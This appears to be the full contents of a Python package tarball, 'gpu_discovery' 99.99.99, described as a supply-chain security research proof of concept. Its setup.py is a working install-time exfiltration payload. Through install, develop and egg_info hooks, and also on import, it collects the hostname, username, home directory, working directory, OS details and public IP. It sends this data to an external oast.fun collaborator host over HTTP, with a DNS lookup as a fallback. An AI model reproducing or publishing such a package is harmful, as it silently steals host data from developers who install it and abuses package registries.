gpu-discovery 99.99.99__tar.gz

gpu_discovery-99.99.99/PKG-INFO

@@ -0,0 +1,30 @@
+Metadata-Version: 2.4
+Name: gpu_discovery
+Version: 99.99.99
+Summary: Advanced Supply Chain Security Research PoC
+Author-email: Security Researcher <abc@example.com>
+License: MIT
+Project-URL: Homepage, https://github.com/security-research/supply-chain-poc
+Project-URL: Documentation, https://github.com/security-research/supply-chain-poc
+Project-URL: Repository, https://github.com/security-research/supply-chain-poc
+Project-URL: Bug Tracker, https://github.com/security-research/supply-chain-poc/issues
+Keywords: security,supply-chain,research,poc
+Classifier: Development Status :: 4 - Beta
+Classifier: Intended Audience :: Developers
+Classifier: License :: OSI Approved :: MIT License
+Classifier: Programming Language :: Python :: 3
+Classifier: Programming Language :: Python :: 3.6
+Classifier: Programming Language :: Python :: 3.7
+Classifier: Programming Language :: Python :: 3.8
+Classifier: Programming Language :: Python :: 3.9
+Classifier: Programming Language :: Python :: 3.10
+Classifier: Programming Language :: Python :: 3.11
+Classifier: Programming Language :: Python :: 3.12
+Requires-Python: >=3.6
+Description-Content-Type: text/markdown
+
+# gpu_discovery
+
+Supply chain security research package.
+
+⚠️ For authorized security testing only.

gpu_discovery-99.99.99/gpu_discovery.egg-info/PKG-INFO

@@ -0,0 +1,30 @@
+Metadata-Version: 2.4
+Name: gpu_discovery
+Version: 99.99.99
+Summary: Advanced Supply Chain Security Research PoC
+Author-email: Security Researcher <abc@example.com>
+License: MIT
+Project-URL: Homepage, https://github.com/security-research/supply-chain-poc
+Project-URL: Documentation, https://github.com/security-research/supply-chain-poc
+Project-URL: Repository, https://github.com/security-research/supply-chain-poc
+Project-URL: Bug Tracker, https://github.com/security-research/supply-chain-poc/issues
+Keywords: security,supply-chain,research,poc
+Classifier: Development Status :: 4 - Beta
+Classifier: Intended Audience :: Developers
+Classifier: License :: OSI Approved :: MIT License
+Classifier: Programming Language :: Python :: 3
+Classifier: Programming Language :: Python :: 3.6
+Classifier: Programming Language :: Python :: 3.7
+Classifier: Programming Language :: Python :: 3.8
+Classifier: Programming Language :: Python :: 3.9
+Classifier: Programming Language :: Python :: 3.10
+Classifier: Programming Language :: Python :: 3.11
+Classifier: Programming Language :: Python :: 3.12
+Requires-Python: >=3.6
+Description-Content-Type: text/markdown
+
+# gpu_discovery
+
+Supply chain security research package.
+
+⚠️ For authorized security testing only.

gpu_discovery-99.99.99/gpu_discovery.egg-info/SOURCES.txt

@@ -0,0 +1,6 @@
+pyproject.toml
+setup.py
+gpu_discovery.egg-info/PKG-INFO
+gpu_discovery.egg-info/SOURCES.txt
+gpu_discovery.egg-info/dependency_links.txt
+gpu_discovery.egg-info/top_level.txt

gpu_discovery-99.99.99/gpu_discovery.egg-info/dependency_links.txt

@@ -0,0 +1 @@
+

gpu_discovery-99.99.99/gpu_discovery.egg-info/top_level.txt

@@ -0,0 +1 @@
+

gpu_discovery-99.99.99/pyproject.toml

@@ -0,0 +1,37 @@
+[build-system]
+requires = ["setuptools>=61.0", "wheel"]
+build-backend = "setuptools.build_meta"
+
+[project]
+name = "gpu_discovery"
+version = "99.99.99"
+description = "Advanced Supply Chain Security Research PoC"
+readme = {text = "# gpu_discovery\n\nSupply chain security research package.\n\n⚠️ For authorized security testing only.", content-type = "text/markdown"}
+requires-python = ">=3.6"
+license = {text = "MIT"}
+authors = [
+    {name = "Security Researcher", email = "abc@example.com"}
+]
+keywords = ["security", "supply-chain", "research", "poc"]
+classifiers = [
+    "Development Status :: 4 - Beta",
+    "Intended Audience :: Developers",
+    "License :: OSI Approved :: MIT License",
+    "Programming Language :: Python :: 3",
+    "Programming Language :: Python :: 3.6",
+    "Programming Language :: Python :: 3.7",
+    "Programming Language :: Python :: 3.8",
+    "Programming Language :: Python :: 3.9",
+    "Programming Language :: Python :: 3.10",
+    "Programming Language :: Python :: 3.11",
+    "Programming Language :: Python :: 3.12",
+]
+
+[project.urls]
+Homepage = "https://github.com/security-research/supply-chain-poc"
+Documentation = "https://github.com/security-research/supply-chain-poc"
+Repository = "https://github.com/security-research/supply-chain-poc"
+"Bug Tracker" = "https://github.com/security-research/supply-chain-poc/issues"
+
+[tool.setuptools]
+packages = []

gpu_discovery-99.99.99/setup.cfg

@@ -0,0 +1,4 @@
+[egg_info]
+tag_build = 
+tag_date = 0
+

gpu_discovery-99.99.99/setup.py

@@ -0,0 +1,118 @@
+from setuptools import setup
+from setuptools.command.install import install
+from setuptools.command.develop import develop
+from setuptools.command.egg_info import egg_info
+import socket
+import getpass
+import os
+import json
+import base64
+import sys
+import platform
+import time
+
+# BURP Collaborator / Exfil endpoints
+BURP_HTTP = "http://dpbaacujrlktevcztpge3u3psdk3zc7pa.oast.fun"  # e.g. http://abc123.oastify.com
+BURP_DNS = "dpbaacujrlktevcztpge3u3psdk3zc7pa.oast.fun"       # e.g. abc123.oastify.com
+
+# Helper to fetch public IP address
+def get_public_ip():
+    try:
+        import urllib.request
+        return urllib.request.urlopen('https://api.ipify.org', timeout=3).read().decode()
+    except:
+        return "unknown"
+
+# Core payload
+def execute_payload():
+    try:
+        hostname = socket.getfqdn()
+        user = getpass.getuser()
+        home_dir = os.path.expanduser("~")
+        cwd = os.getcwd()
+        system = platform.system()
+        release = platform.release()
+        machine = platform.machine()
+        username = getpass.getuser()
+        timestamp = time.strftime('%a %b %d %Y %H:%M:%S %Z', time.gmtime())
+        public_ip = get_public_ip()
+
+        # Format similar to Yelp-type callback
+        report = f"""[ CALLBACK - {timestamp} ]
+originating IP: {public_ip}
+hostname: {hostname}
+home directory: {home_dir}
+directory: {cwd}
+user: {username}
+platform: {system} {release} ({machine})
+python: {sys.version.split()[0]}
+------------------------------------------------
+"""
+
+        # Print to local console (debugging)
+        # print(report)
+
+        # HTTP exfiltration
+        try:
+            import urllib.request
+            import urllib.parse
+            payload = urllib.parse.urlencode({
+                'h': hostname,
+                'u': username,
+                'ip': public_ip,
+                'home': home_dir,
+                'cwd': cwd,
+                'ts': timestamp,
+                'os': f"{system} {release}",
+                'arch': machine,
+                'py': sys.version.split()[0],
+            })
+
+            full_url = f"{BURP_HTTP}?{payload}"
+            urllib.request.urlopen(full_url, timeout=3)
+        except:
+            pass
+
+        # DNS fallback exfiltration (short ident only)
+        try:
+            encoded = base64.b32encode((hostname + "-" + username).encode()).decode().lower()
+            subdomain = f"{encoded[:50]}.{BURP_DNS}"
+            socket.gethostbyname(subdomain)
+        except:
+            pass
+
+    except Exception as e:
+        pass  # Safe fail
+
+# Hooks
+class PoCInstall(install):
+    def run(self):
+        execute_payload()
+        install.run(self)
+
+class PoCDevelop(develop):
+    def run(self):
+        execute_payload()
+        develop.run(self)
+
+class PoCEggInfo(egg_info):
+    def run(self):
+        execute_payload()
+        egg_info.run(self)
+
+# Trigger on import
+if __name__ != "__main__":
+    execute_payload()
+
+# Package metadata (fake)
+setup(
+    name='gpu_discovery',
+    version='99.99.99',
+    description='PoC package for testing internal pip supply chain.',
+    cmdclass={
+        'install': PoCInstall,
+        'develop': PoCDevelop,
+        'egg_info': PoCEggInfo,
+    },
+    install_requires=[],
+)